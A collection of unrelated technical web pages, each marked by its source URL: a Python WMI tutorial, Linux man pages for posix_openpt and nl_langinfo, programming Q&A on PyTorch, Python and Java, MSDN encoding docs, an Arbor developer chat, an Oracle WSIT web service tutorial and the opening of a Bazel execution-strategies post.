--strategy_regexp flag to select strategies based on action messages, but I’ll leave the “magic” of that aside. And there is also some fancy support for automatic strategy selection. Regarding implementation, all strategies are classes that implement the SpawnActionContext interface. Overly simplifying, they must provide an exec() method that takes a Spawn (essentially a command line description) and returns a collection of SpawnResults. Why a collection? 
Because a strategy may implement retries, and their failed results are exposed as part of the return value. Looking further into their implementation, strategies wrap a SpawnRunner, which is the thing that actually knows how to run a spawn. You will notice that this interface’s exec() returns a single SpawnResult, which helps understand how the strategy and its spawn runner relate: the strategy contains higher-level logic around the spawn runner and the spawn runner is in charge of the execution details. With that, let’s now review the primary strategies in Bazel. The standalone strategy The standalone (aka local) strategy is the simplest you can have, and is a good starting point to learn more about the internals of strategies and process execution in Bazel. This strategy executes spawns directly on the output tree. That is: the commands are run with a current working directory that resides inside the output tree and all file references are within that directory. There are no restrictions on what the process can do, so the process can inadvertently have side-effects on unrelated files. This strategy is at StandaloneSpawnStrategy and uses the LocalSpawnRunner. The sandboxed strategy The sandboxed strategy exists to support Bazel’s promise of correct builds and is the default strategy for any local action (which means all actions unless you are doing any customization). This strategy runs each spawn under a controlled environment that is isolated from the output tree and that is prevented from interacting with the system in certain ways (e.g. no networking access). During an exec(), the sandbox strategy performs these steps: - Create a directory outside of the output tree that exclusively contains the inputs required by the spawn as read-only files. This is currently done in the form of a symlink forest. 
- Execute the spawn under that separate directory, using system-specific technologies like namespaces on Linux and sandbox-exec on macOS to constrain what the process can do.
- Move the outputs out of the sandbox and into the output tree.
- Delete the sandbox.

This approach works… but can have a significant penalty on action execution performance. This has been a pet peeve of mine and I've been trying to improve it for a long time with sandboxfs, though I haven't gotten to major breakthroughs just yet. This strategy is implemented as one class per supported operating system and all of them live under the sandbox subdirectory.

The worker strategy

The worker strategy exists to speed up the edit/build/test cycle of languages whose compiler is costly to start or whose compiler keeps state around to optimize incremental builds. The strategy communicates with a long-lived persistent worker process and essentially sends the command lines to execute to that separate process. For example: in the case of Java, the persistent worker avoids the penalty of JVM startup and JIT warmup times; and in the case of Dart, the persistent worker allows the compiler to keep file state in memory so that subsequent compilations are much faster.

The risk of allowing workers is that they can introduce correctness issues more easily than the typical startup/shutdown process: any bugs while processing an action, which may be harmless if the compiler is shut down immediately afterwards, can have cascading effects if the compiler is kept around for a long time and reused for other files. (Yes, we have hit these kinds of issues in e.g. the Swift worker.) Additionally, worker management in Bazel is currently very rudimentary, so blindly enabling workers can make your machine melt due to memory pressure. We have plans to improve this significantly but haven't gotten to them just yet. This strategy is at WorkerSpawnStrategy and uses the WorkerSpawnRunner.
The remote strategy

The remote strategy is the crown jewel of Bazel. This strategy is what allows Bazel to execute processes on remote machines, thus letting your project break loose of the constraints of a single machine's build power. This is the most complex strategy of all, if only because of the need to coordinate with remote machines over gRPC, having to multiplex requests, and having to deal with networking hiccups. I will not dive into any of its details here. This strategy is at RemoteSpawnStrategy and uses the RemoteSpawnRunner.

That's all for today. In the coming posts, I'll cover dynamic execution in detail and will likely refer to this post on multiple occasions. Be aware, however, that a lot of the details on how strategies are defined and registered in Bazel are about to change as part of the ongoing Platforms & Toolchains work. The specifics behind strategy implementation should not change, though.
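The division of labor described earlier — the strategy holding the higher-level logic (such as retries) around a SpawnRunner that does the actual execution — can be sketched in a few lines. This is illustrative Python, not Bazel's actual Java interfaces; the class names are borrowed from the post, and the retry policy is made up:

```python
from dataclasses import dataclass

@dataclass
class SpawnResult:
    exit_code: int

class SpawnRunner:
    """Knows how to actually run one spawn (the execution details)."""
    def exec(self, spawn) -> SpawnResult:
        raise NotImplementedError

class FlakyRunner(SpawnRunner):
    """Stand-in runner that fails a configurable number of times."""
    def __init__(self, fail_times: int):
        self.fail_times = fail_times

    def exec(self, spawn) -> SpawnResult:
        if self.fail_times > 0:
            self.fail_times -= 1
            return SpawnResult(exit_code=1)
        return SpawnResult(exit_code=0)

class RetryingStrategy:
    """Higher-level logic around the runner. Returns a *collection* of
    results because failed attempts are exposed alongside the success."""
    def __init__(self, runner: SpawnRunner, max_attempts: int = 3):
        self.runner = runner
        self.max_attempts = max_attempts

    def exec(self, spawn) -> list:
        results = []
        for _ in range(self.max_attempts):
            result = self.runner.exec(spawn)
            results.append(result)
            if result.exit_code == 0:
                break
        return results

results = RetryingStrategy(FlakyRunner(fail_times=1)).exec("compile foo.cc")
print([r.exit_code for r in results])  # [1, 0]: the failed attempt, then the success
```

Swapping the runner (standalone, sandboxed, worker, remote) changes where and how the spawn runs without touching the strategy's surrounding logic — which is the invariant the post describes.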
https://jmmv.dev/2019/12/bazel-strategies.html
Adding libs (QT += ...) didn't work

Hello. I have a problem with adding new libs to a project. I tried adding "xml" to QT += core, but that didn't work. Nothing changes. My workspace: Qt 5.3 MinGW 32bit (auto-detected), MinGW 4.8.2 32bit (auto-detected). How can I add new libraries? I tried various options, but those failed too. Please help. Jareq000

Hi, add QT += xml

Hi, you should add the contents of your .pro file as well, since that is where the relevant items are located. And instead of a screenshot, please just add the text in a code tag.

That's my .pro file:

@TEMPLATE = app
CONFIG += console
CONFIG -= app_bundle
CONFIG -= qt
SOURCES += main.cpp
QT += core
QT += xml
INCLUDEPATH += C:/Qt/Qt5.3.1/5.3/mingw482_32/include@

and that didn't work. I think that Qt can't find the libraries. I tried to add them, but it didn't work. Where can I check if everything is OK?

Did you run qmake after you modified the .pro file? If not, run qmake (you can find it in the Build menu in Creator) and after that the linker should find the xml module libraries. And also the include should work without the module name:

@
#include <QFile>
#include <QDomDocument>
//...
@

Yes, I ran qmake. If I include this line, Qt warns:

@error: QFile: No such file or directory #include <QFile>@

Why do you have @CONFIG -= qt@ in your .pro file? Remove that line and try again.

It works! :D @CONFIG -= qt@ was added automatically, but why? Thanks for the replies.

Maybe you chose a "non qt" application when you created the project.

Yes, I did. Now I understand. Thank you.

Hi, that's really great. Please mark the thread title as SOLVED so other members can see it as solved.
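For reference, putting the fixes from the thread together, a working .pro for this project would look roughly like the fragment below (the offending @CONFIG -= qt@ line is gone; the manual INCLUDEPATH workaround should no longer be needed once the qt config is restored, since QT += core and QT += xml let qmake supply the include paths):

@
TEMPLATE = app
CONFIG += console
CONFIG -= app_bundle
SOURCES += main.cpp
QT += core
QT += xml
@

Remember to re-run qmake after changing it.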
https://forum.qt.io/topic/43899/adding-libs-qt-didn-t-work
This chapter provides an overview of developing search applications in MarkLogic Server, and includes the following sections:

MarkLogic Server includes rich full-text search features. All of the search features are implemented as extension functions available in XQuery, and most of them are also available through the REST and Java interfaces. This section provides a brief overview of some of the main search features in MarkLogic Server and includes the following parts:
Each of the APIs described in APIs for Multiple Programming Languages enables you to perform fine-grained searches. The cts:search function returns raw results as a sequence of matching nodes. The Search, REST, Node.js and Java APIs accept more abstract query styles such as string and structured queries, and return results either in report form, as an XML search:response (or equivalent JSON structure) or matching documents. The customizable search:response can include details such as snippets with highlighting of matching terms and query metrics. The REST and Java APIs can also return the results report as JSON. The following diagram summarizes the query styles and results formats each API provides for searching content and metadata: The following table provides a brief description of each query style. The level of complexity of query construction increases as you read down the table. A query encapsulates your search criteria. When you search for documents matching a query, your criteria fall into one or more of the query types described in this section, no matter what query style you use (string, structured, QBE, etc.). The following query types are basic search building blocks that describe the content you want to match. Additional query types enable you to build up complex queries by combining the basic content queries with each other and with criteria that add additional constraints. The additional query types fall into the following categories. The CTS API includes query constructors for all the above query types, such as cts:*-range-query, cts:*-value-query, cts:*-word-query, cts:and-query, cts:collection-query, and cts:near-query. For details, see Composing cts:query Expressions. With no additional configuration, string queries support term queries and logical composers. For example, the query string cat AND dog is implicitly two term queries, joined by an and logical composer. 
However, you can easily extend the expressive power of a string query using constraint bindings to enable additional query types. For example, if you use a range constraint binding to tie the identifier cost to a specific indexed JSON property, you enable string queries of the form cost GT 10. For details, see Searching Using String Queries.

In a QBE, content matches are value queries by default. For example, a QBE search criterion of the form {'my-key': 'desired-value'} is implicitly a value query for the JSON property 'my-key' whose value is exactly 'desired-value'. However, the QBE syntax includes special property names that enable you to construct other types of query. For example, use $word to create a word query instead of a value query: {'my-key': {'$word': 'desired-value'}}. For details, see Searching Using Query By Example.

Structured query includes components that encompass all the query types, such as value-query, range-query, term-query, and-query, and directory-query. Some of the Client APIs include a structured query builder interface to assist you with structured query composition. For details, see Searching Using Structured Queries.

MarkLogic Server implements the XQuery language, which includes XPath 2.0. An XPath expression is itself a search that can query XML. MarkLogic Server extends XPath so that you can also use it to address JSON content. For details, see Traversing JSON Documents Using XPath in the Application Developer's Guide.

MarkLogic Server enables you to define range indexes which index XML structures such as elements and element attributes, XPath expressions, and JSON properties. You can also define range indexes over geospatial values. Each of these range indexes has lexicon APIs associated with it. The lexicon APIs enable you to return values directly from the indexes. Lexicons are very useful in constructing facets and in finding fast counts of XML element, XML attribute, and JSON property values.
The Search API and the Node.js, Java, and REST Client APIs make extensive use of the lexicon features. For details about lexicons, see Browsing With Lexicons.

MarkLogic Server search supports a wide range of full-text features. These features include stemming, wildcarded searches, diacritic-sensitive/insensitive searches, case-sensitive/insensitive searches, spelling correction functions, thesaurus functions, geospatial searches, advanced language and collation support, and much more. These features are all designed to build off of each other and work together in an extensible and flexible way.

The MarkLogic XQuery and XSLT Function Reference contains the XQuery function signatures and descriptions, as well as many code examples. This Search Developer's Guide contains descriptions and technical details about the search features in MarkLogic Server, including: For other information about developing applications in MarkLogic Server, see the Application Developer's Guide. For information about XQuery in MarkLogic Server, see the XQuery and XSLT Reference Guide.
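The query types above compose mechanically. As a concrete, illustrative sketch, here is how the JSON form of a structured query could be assembled in Python for POSTing to the REST API's /v1/search endpoint. The element names (term-query, value-query, and-query) follow the structured query format as I understand it from these docs — verify them against the Searching Using Structured Queries section before relying on them.

```python
def term_query(text):
    # Word/phrase match anywhere in the document.
    return {"term-query": {"text": [text]}}

def value_query(json_property, value):
    # Exact-value match on a JSON property.
    return {"value-query": {"json-property": json_property, "text": [value]}}

def and_query(*queries):
    # Logical composer: all sub-queries must match.
    return {"and-query": {"queries": list(queries)}}

def structured_query(q):
    # Top-level wrapper expected by the search endpoint.
    return {"query": {"queries": [q]}}

payload = structured_query(
    and_query(term_query("cat"), value_query("species", "feline"))
)
print(payload)
```

Serialized with json.dumps, this payload is what a client would send when the higher-level query builders (Java, Node.js) aren't available.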
https://docs.marklogic.com/guide/search-dev/searchdev
Recognize Stars and Planets Using Your Mac / Linux Computer and a Raspberry Pi: Intro to Machine Learning

Introduction:

Hi, thank you for reading this post! Since I was a small child, I've been obsessed with technology and space. But the computers were still too weak to simulate the instruments that are used nowadays (I'm 13 years old btw). But now, computers are much faster and better. So when I found out that there was software that could recognize images and was programmable, I immediately thought of this project. In this project we'll use a Mac or a Linux computer. Windows computers are sadly not supported by this framework, but you could try this:... .

For this project you'll need:
- A Mac / Linux computer

For the bonus part with the Raspberry Pi you'll need:
- A Raspberry Pi (I used the second model)
- The official Raspberry Pi camera board
- A breadboard
- A button
- A telescope

Step 1: What Is TensorFlow for Poets?

In this project, we will be using TensorFlow for Poets. This is open-source software, made by Google to use deep machine learning on images. Basically, deep machine learning is teaching the computer to recognize certain things. If you want to learn more about machine learning, you can watch this series made by Google:. TensorFlow for Poets is built upon a framework called Inception. Inception was already "trained" by Google to recognize images like dalmatians and dishwashers, but using TensorFlow for Poets we can retrain it to recognize pictures of stars and planets.

Step 2: Setting Up Docker

To download TensorFlow for Poets, you will need to install Docker first. If you're using a Mac system, continue to step 3 for the installation. If you're using a Linux distro: select your distro on and follow the steps. If you're done with that, go to step 4.

Step 3: Setting Up Docker on OS X

First, go to and download the package for OS X.
If the .pkg file is completely downloaded, click on it and go through the installation process. When the installation has ended, go to Launchpad, select Docker Quickstart Terminal and run

docker run hello-world

This should show you if Docker is installed (see the image above).

Step 4: Installing TensorFlow for Poets

Start Docker and run the following command:

docker run -it gcr.io/tensorflow/tensorflow:latest-devel

This will take a while to install. When it's done, you'll see "root@xxxxxxx#" in front of your command line. This is normal. Now try running Python and using the following code. To start Python run:

python

Then you will see something like this:

Python 3.5.2 |Anaconda 4.1.1 (x86_64)| (default, Jul 2 2016, 17:52:12)
[GCC 4.2.1 Compatible Apple LLVM 4.2 (clang-425.0.28)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>>

Now copy and paste this code into it:

import tensorflow as tf
hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))

If you see "Hello, TensorFlow!" it works.

Step 5: Downloading and Testing the Software

Now, we need to download some images. Download the .zip file under this text and unzip it inside your home folder. Now open the Docker terminal and run

docker run -it -v $HOME/SpaceImages:/SpaceImages gcr.io/tensorflow/tensorflow:latest-devel

And:

cd /tensorflow
git pull #you only have to run this the first time

Now try downloading some images from the internet and place them inside the "test" folder. The image has to be a jpg type of image.
Now run the following code to test the recognition:

python /SpaceImages/label_image.py /SpaceImages/test/IMAGENAME.jpg

(You have to move the image into the SpaceImages folder.) The output will be something like this:

jupiter (score = 0.83155)
venus (score = 0.05715)
earth (score = 0.02341)
mars (score = 0.02076)
saturn (score = 0.01779)
neptune (score = 0.01140)
mercury (score = 0.00969)
arcturus (score = 0.00748)
uranus (score = 0.00463)
iss (score = 0.00418)
canopus (score = 0.00409)
vega (score = 0.00338)
sirius (score = 0.00238)
alpha centauri (score = 0.00212)

jupiter wins.

This will probably work well, but you can make it even better by adding more images to the folders inside the folder "Images". To retrain the software run the following command:

python tensorflow/examples/image_retraining/retrain.py \
  --bottleneck_dir=/SpaceImages/bottlenecks \
  --how_many_training_steps 500 \
  --model_dir=/SpaceImages/inception \
  --output_graph=/SpaceImages/retrained_graph.pb \
  --output_labels=/SpaceImages/retrained_labels.txt \
  --image_dir /SpaceImages/images

Run this command if you have all the time in the world (this will run 4000 steps):

python tensorflow/examples/image_retraining/retrain.py \
  --bottleneck_dir=/SpaceImages/bottlenecks \
  --model_dir=/SpaceImages/inception \
  --output_graph=/SpaceImages/retrained_graph.pb \
  --output_labels=/SpaceImages/retrained_labels.txt \
  --image_dir /SpaceImages/images

You can speed up this process by opening VirtualBox. Select the default machine, click on default, open settings, select system and add more RAM to the process. If you can't change the value, right-click the machine icon and select close via ACPI. Now you can change the value and start the virtual machine again.
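If you want the winning label programmatically instead of eyeballing the list, the label_image output is easy to post-process. Here is a small sketch; it assumes the exact `name (score = 0.12345)` line format shown above:

```python
import re

# Parse lines like "jupiter (score = 0.83155)" into (label, score) pairs.
LINE_RE = re.compile(r"^(.+?) \(score = ([0-9.]+)\)$")

def parse_labels(output):
    results = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            results.append((m.group(1), float(m.group(2))))
    return results

sample = """jupiter (score = 0.83155)
venus (score = 0.05715)
earth (score = 0.02341)"""

scores = parse_labels(sample)
best_label, best_score = max(scores, key=lambda pair: pair[1])
print(best_label, "wins")  # jupiter wins
```

You could pipe the label_image output into a function like this to write the winner to ImageOutput.txt automatically.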
If you want to remove photos or folders, you will have to remove the bottlenecks in the folder /SpaceImages/bottlenecks too.

Step 6: Bonus Part With Raspberry Pi

This part is optional, and if you don't have a Raspberry Pi, or just don't want to use it, please skip to step 10. Are you still reading? Good. In this part we're gonna program our Raspberry Pi to take a picture if a button is pressed, send this picture to the Mac (you could probably use a Linux computer too, but maybe you would have to edit the script a little) and run the script to recognize it. This script will output the result in the ImageOutput.txt file in the text folder (or if it doesn't exist yet, it will create it).

Step 7: Setting Up the Raspberry Pi

Alright, we'll first begin with the easy part: setting up the button. Just connect the button according to the image above (to ground and GPIO 18). Now we'll need to connect the camera to the Raspberry Pi; this can be tricky sometimes. Pull up the white part on the camera connector and push the ribbon cable in. Here's a nice video by the "Raspberry Pi Guy" in which he shows this process: (You may need to allow usage of the camera using the command: raspi-config. See also the image above.) Now download the script TelescopeCamera.py from the description to the Raspberry Pi and edit it to your own passwords and usernames (see the image above).

Step 8: Setup Your Mac (or Possibly Linux Computer)

Download the file StartImageRecognition.txt and change the .txt extension to .sh (Instructables doesn't accept .sh files). Save this file again to the home folder. Now open the file; you'll see that the PROCESSNUMBER part has to be replaced. To do this you'll need to run

docker ps

and insert the code that looks something like 81764e94e38f in the place of the text PROCESSNUMBER. If docker ps doesn't return anything, run the following command:

docker run -it -v $HOME/SpaceImages:/SpaceImages gcr.io/tensorflow/tensorflow:latest-devel

Exit it and try again.
You probably could use this script on a Linux computer, but you might have to edit the script a little bit. Look at the images for more clarification Step 9: Finishing It All Now run on the Raspberry Pi sudo python TelescopeCamera.py And click the button. You now should see an image appear in the folder /SpaceImages/test on the computer and a textfile with the result (see in the image abov). You could now mount your Raspberry Pi under a telescope and test it out, or you could take a more complicated way like in the image above (I haven't got a picture of it because I don't have a telescope myself). This finishes the bonus part. Step 10: Other Purposes I used the tensorflow software to recognize planets, but if you copy the script label_images.py, use the same as in this project and change all commands to your new folder name you could also use this software to recognize animals, plants or other objects. I even got face recognition working using this software! Step 11: Thank You for Reading My Instructable! If you liked my article, please vote for me in the Space contest. Also leave a comment if you have difficulties with executing this project or if you have feedback. Could you do this on microsoft devices? Hi, Tensorflow for Poets is sadly not natively supported by Windows. You could try this:... but I can't guarantee that it will work. You could also dual-boot linux on your device, here's a good tutorial for that: . Lastly you could install Linux in virtualbox, you can do that by downloading the .iso file from a linux distribution and installing it in virtualbox. Did this answer your question? Very interesting project. Thanks for sharing!
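I can't reproduce the exact TelescopeCamera.py here, but a hedged sketch of what such a script could look like is below: wait for the button on GPIO 18, capture a photo, and copy it to the computer. The hostname, username, and destination path are placeholders, the debounce is crude, and the hardware-specific imports are kept inside main() so the file can at least be loaded on a machine without the Pi libraries.

```python
import time

def capture_filename(prefix="space", ext="jpg"):
    # Timestamped name so repeated button presses never overwrite a shot.
    return "%s-%d.%s" % (prefix, int(time.time()), ext)

def main():
    # Hardware-only imports: these exist on the Pi, not on a desktop.
    import subprocess
    import RPi.GPIO as GPIO
    from picamera import PiCamera

    GPIO.setmode(GPIO.BCM)
    GPIO.setup(18, GPIO.IN, pull_up_down=GPIO.PUD_UP)  # button to ground

    camera = PiCamera()
    try:
        while True:
            GPIO.wait_for_edge(18, GPIO.FALLING)  # block until pressed
            name = capture_filename()
            camera.capture(name)
            # Placeholder user/host/path -- edit to match your computer.
            subprocess.call(
                ["scp", name, "user@your-mac.local:SpaceImages/test/"])
            time.sleep(0.5)  # crude debounce
    finally:
        GPIO.cleanup()

# On the Pi, start the loop with:
# main()
```

For password-less scp from the Pi you'd set up an SSH key; otherwise the real script would have to carry credentials, which matches the "edit it to your own passwords and usernames" step above.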
http://www.instructables.com/id/Intro-to-Machine-Learning-Recognize-Stars-and-Plan/
CC-MAIN-2018-05
refinedweb
1,540
66.13
Bart De Smet's on-line blog (0x2B | ~0x2B, that's the question)

By now, most – if not all – readers of my blog will be familiar with this C# 3.0 and VB 9.0 feature called Local Variable Type Inference or Implicitly Typed Local Variables. The idea is simple: since the compiler knows (and hence can infer) type information for expressions, also referred to as rvals, there's no need for the developer to say the type. In most cases it's a convenience, for example:

Dictionary<Customer, List<PhoneNumber>> phonebook = new Dictionary<Customer, List<PhoneNumber>>();

That's literally saying the same thing twice: declare a variable of type mumble-mumble and assign it a new instance of type mumble-mumble. Wouldn't it be nice just to say:

var phonebook = new Dictionary<Customer, List<PhoneNumber>>();

while it still means exactly the same as the original fragment? That's what this language feature allows us to do without losing any of the strong typing. The reason it's very convenient in the sample above is because of the introduction of arbitrary type construction capabilities due to generics in CLR 2.0. Before this invention, types couldn't compose into arbitrarily big ones and type names tended to be not too long-winded (namespaces help here too). As convenient as the case above can be, sometimes type inference is a requirement, introduced by the invention of anonymous types. Typically those are used in projection clauses of LINQ queries although they can be used in separation as well.
E.g.:

var res = from p in Process.GetProcesses()
          select new { Name = p.ProcessName, Memory = p.WorkingSet64 };

This piece of code gives birth to an anonymous type with two properties, Name and Memory (notice the type of those properties is inferred in a similar way from their assigned right-hand side), which is – as the name implies – a type with an unspeakable name. In reality the above produces something like:

IEnumerable<AnonymousType1> res = from p in Process.GetProcesses()
                                  select new { Name = p.ProcessName, Memory = p.WorkingSet64 };

where the AnonymousType1 portion is unknown to the developer, so type inference comes to the rescue.

Alright. But when is it appropriate to use the type inference feature? Here are some personal rules I tend to apply quite strictly:

Also, it's important to realize that mechanical changes to variable declarations (for fun?) can yield undesired behavior due to a change in semantics. A few cases pop to mind:

static void Main(string[] args)
{
    IBar b1 = new Bar();
    b1.Foo();

    var b2 = new Bar();
    b2.Foo();
}

interface IBar
{
    void Foo();
}

class Bar : IBar
{
    public void Foo() { Console.WriteLine("Bar.Foo"); }
    void IBar.Foo() { Console.WriteLine("IBar.Foo"); }
}

static void Main(string[] args)
{
    Foo f1 = new ExtendedFoo();
    f1.Bar();

    var f2 = new ExtendedFoo();
    f2.Bar();
}

class Foo
{
    public virtual void Bar() { Console.WriteLine("Foo.Bar"); }
}

class ExtendedFoo : Foo
{
    public new void Bar() { Console.WriteLine("ExtendedFoo.Bar"); }
}

In the end, as usual, there's no silver bullet. However, one should optimize code for reading it (write-once, read-many philosophy).
When trying to understand programs (at least imperative ones <g>) we already have to do quite some mental "step through" to absorb the implementation specifics with loops, conditions, class hierarchies, etc. We shouldn't extend this process of mental debugging or reverse engineering with type inference overhead in cases where it's not immediately apparent what the intended type is. Even though the IDE will tell you the type of an implicitly typed local when hovering over it, it's not the kind of thing we want to rely on to decipher every single piece of code. Similarly, IntelliSense works great for implicitly typed local variables, but that only affects the write-once side of the story. After all, every powerful tool imposes a danger when misused. Type inference is no different in this respect.

"Don't use type inference in foreach"

It's a matter of taste, but I would have to disagree - I don't find it a "DO NOT" rule, but rather a "CONSIDER". It all ends up with arguments pro and con readability, and that's subjective most of the time. I, for one, do not like to specify a type name that will take up half the screen (for instance, a typed dataset's row type) in a foreach loop when I can avoid it. Also, LVTI is required in LINQ's let statements, so you have no choice there regarding the rules you mentioned. I usually default to casting the result of the let statement to the desired type to force LVTI to choose it.

Pingback from Dew Drop - August 23, 2008 | Alvin Ashcraft's Morning Dew

"when the right-hand side doesn't clearly indicate the type:"

Why? If you are using an anonymous type you don't care what class is returned. So why do you care when it isn't an anonymous type? Seems to me what really matters is how the object is being used; its type is just bookkeeping. To put it another way, consider your example again:

var something = someObject.WeirdMethod().AnotherProperty

Why do you care what type "something" is but not care about the object returned by "WeirdMethod"?

Hi Omer, I agree that the foreach case is "debatable" from situation to situation. Carefully chosen variable names or method names (e.g. for iterators returning a sequence consumed by foreach) can definitely help, e.g. customers or GetCustomers(). For strongly typed datasets, the "table" referenced in the "in clause" typically reveals the type too. You're absolutely right about the let clause (not a "let statement", to be nitpicky) being another case where type inference is a requirement. Coming from the framework development side of things, I'm more in the extremist camp, opting for more verbosity to help with the maintainability of large code bases and with reading changelists from a few years back written by other people (or even by yourself after such a time). As Jeffrey Snover (PowerShell) says: "sometimes verbosity is your friend but sometimes it can be your enemy too". In the end it's, as you say, a matter of taste.

Thanks,
-Bart
To put it another way, consider your example again:

var something = someObject.WeirdMethod().AnotherProperty;

Why do you care what type "something" is but not care about the object returned by "WeirdMethod"?

Hi Omer,

I agree on the foreach case to be "debatable" from situation to situation. Carefully chosen variable names or method names (e.g. for iterators returning a sequence consumed by foreach) can definitely help, e.g. customers or GetCustomers(). For strongly typed datasets, the "table" referenced in the "in clause" typically reveals the type too. You're absolutely right about the let clause (not a "let statement" to be nitpicky) being another case where type inference is a requirement. Coming from the framework development side of things, I'm more in the extremist camp opting for more verbosity to help with maintainability of large code bases, reading changelists from a few years back written by other people (or even from yourself after such a time). As Jeffrey Snover (PowerShell) says: "sometimes verbosity is your friend but sometimes it can be your enemy too". In the end it's, as you say, a matter of taste.

Thanks,
-Bart

Hi Jonathan,

I'm one of those folks coming from a left-to-right culture who likes to see the type; seeing "var" means to me that I'll be able to infer the type straight away when moving on. For anonymous types, the shape of the type will be indicated on the right-hand side (which is - to some extent - even more interesting for the reader, as all of the properties are immediately indicated for further consumption in the local method scope, but that would need to be the subject of a separate post on appropriate use of anonymous types). This being said, it's possible of course to make the anonymous type by itself cumbersome when assigning complex expressions to its properties (something that on the other hand might indicate "reckless" composition that will be hard to debug).
Assume you're reading a chunk of code that calls out to some random API, calling a method WeirdMethod:

var something = someObject.WeirdMethod().AnotherProperty;

To come back to your question why I don't seem to care about the type of WeirdMethod() - I do. In general, I don't like this kind of chaining for non-fluent APIs. Required null-checks might be omitted (and no, Spec#'s verification guarantees wouldn't be a good excuse to start writing this kind of code either IMO :-)), exception stack traces with line numbers might be confusing (where in the chain did it blow up), and more such horror stories concerning step-by-step debugging one method call at a time, checking the return value after every step. In fact, the line above (assuming we know the type of someObject) already has var² complexity. The main problem I have with this is that the reader has little context to learn more about some API use to help in understanding or debugging (in the former case, reading code listings on a patio on a hot summer evening is typically a setting without tools; the latter case is typically a setting with tools). For some reason you want to learn more about AnotherProperty - if you'd have the type of the WeirdMethod() result available, you'd know where to look straight away. If not, you have to work your way back to a "known type" point and go from there. Also, just seeing the type name might set quite some context (e.g. OrderServiceProxy) that's very useful to absorb specific aspects of the code (web service calls, interop code, specific APIs with certain reputations, etc.).

I was actually going to write 'let expression' and have no idea why I wrote 'statement'. Still, clause is probably best :)

Indeed, expression would be better, but clause is preferable for the following reason.
Expressions can be composed of other expressions and/or clauses, where clauses can't stand by themselves while expressions can (for example: query expression > where clause > predicate expression).
http://community.bartdesmet.net/blogs/bart/archive/2008/08/23/appropriate-use-of-local-variable-type-inference.aspx
I'm trying to execute the following Python code:

def monotonic(a):
    n = len(a)
    for i in range(n):
        if((a[i]<a[i+1]) or (a[i]>a[1+1])):
            return true

a = [6, 5, 4, 3, 2]
print(monotonic(a))

And I get the following error:

NameError: global name 'true' is not defined
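The NameError is raised because Python's boolean literals are capitalized (True/False), so `return true` refers to an undefined name. There are two more problems: the loop lets `i` reach `n - 1` and then reads `a[i+1]`, which is out of range, and `a[1+1]` looks like a typo for `a[i+1]`. A corrected sketch (the logic is restructured as well, since returning on the first comparison cannot establish whether the whole list is monotonic):

```python
def monotonic(a):
    # True if the list is entirely non-decreasing or entirely non-increasing
    increasing = all(a[i] <= a[i + 1] for i in range(len(a) - 1))
    decreasing = all(a[i] >= a[i + 1] for i in range(len(a) - 1))
    return increasing or decreasing

print(monotonic([6, 5, 4, 3, 2]))  # True
print(monotonic([1, 3, 2]))        # False
```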
https://www.edureka.co/community/49371/python-error-saying-nameerror-global-name-true-not-defined
I am participating in a cyber-sec course at the local uni. Our first project involves a web server that has a submission form and students' scores reflected on it. You gain points by submitting the hash value of a secret word of a fellow student. For every point you gain, they lose a point. One of the aspects of the project is automation. I noticed that if I just refresh the submission-confirmed page, it resubmits my points. So, I wrote a simple Java program that just accesses this page as fast as it can.

My question: Can any of you spot a way to make this faster? It seems it takes almost a second or two for each submission. Is the u.openStream(); waiting for a response? Is there a way to make it just submit, then ignore the response? Is this the most efficient way to be doing this?

URL I am submitting is as follows:

The code I have thus far is below. Basically, start twenty (or more) threads, and in each thread loop the openStream().

import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;
import java.io.IOException;
import java.io.BufferedInputStream;

class XThread extends Thread {

    XThread() {
    }

    XThread(String threadName) {
        super(threadName); // Initialize thread.
        //System.out.println(this);
        start();
    }

    public void run() {
        // Display info about this particular thread
        URL u;
        BufferedInputStream is = null;
        String myNAME = new String("me");
        String vNAME = new String("andrew");
        String vHASH = new String("4252943e53d9677d1ef12f4fad9e026b"); // me
        // int wall=1;
        try {
            u = new URL("" + myNAME + "&Victim=" + vNAME + "&VictimHash=" + vHASH);
            for (int i = 0; i < 1000000; i++) {
                is = new BufferedInputStream(u.openStream());
                System.out.println(i);
                is.close();
            }
        } catch (MalformedURLException mue) {
            System.out.println("Ouch - a MalformedURLException happened.");
            mue.printStackTrace();
            System.exit(1);
        } catch (IOException ioe) {
            System.out.println("Oops - an IOException happened.");
            ioe.printStackTrace();
            System.exit(1);
        } finally {
            try {
                if (is != null) {
                    is.close();
                }
            } catch (IOException ioe) {
                // just going to ignore this one
            }
        } // end of 'finally' clause
    }
}

public class SingleUser {

    public static void main(String[] args) {
        // create and start twenty worker threads
        for (int i = 0; i < 20; i++) {
            new XThread().start();
        }
    }
}
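On the "is openStream() waiting for a response" question: yes, URL.openStream() opens the connection and blocks until the server begins responding, so each loop iteration pays a full round trip. One alternative is java.net.http.HttpClient (Java 11+): sendAsync returns immediately with a CompletableFuture, and BodyHandlers.discarding() never downloads the response body. A hedged sketch — the base URL is a placeholder and the query parameters are modeled on the question; the actual send is left commented out since it needs a reachable server:

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;

public class AsyncSubmit {

    static HttpRequest buildRequest(String submitter, String victim, String hash) {
        // hypothetical endpoint and parameter names, modeled on the question
        String url = "http://example.com/submit?Submitter=" + submitter
                + "&Victim=" + victim + "&VictimHash=" + hash;
        return HttpRequest.newBuilder().uri(URI.create(url)).GET().build();
    }

    public static void main(String[] args) {
        HttpClient client = HttpClient.newHttpClient();
        HttpRequest req = buildRequest("me", "andrew", "4252943e53d9677d1ef12f4fad9e026b");
        // Fires the request without blocking and without reading the body:
        // client.sendAsync(req, java.net.http.HttpResponse.BodyHandlers.discarding());
        System.out.println(req.uri().getHost());
    }
}
```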
http://www.javaprogrammingforums.com/%20java-networking/5161-need-more-speed-printingthethread.html
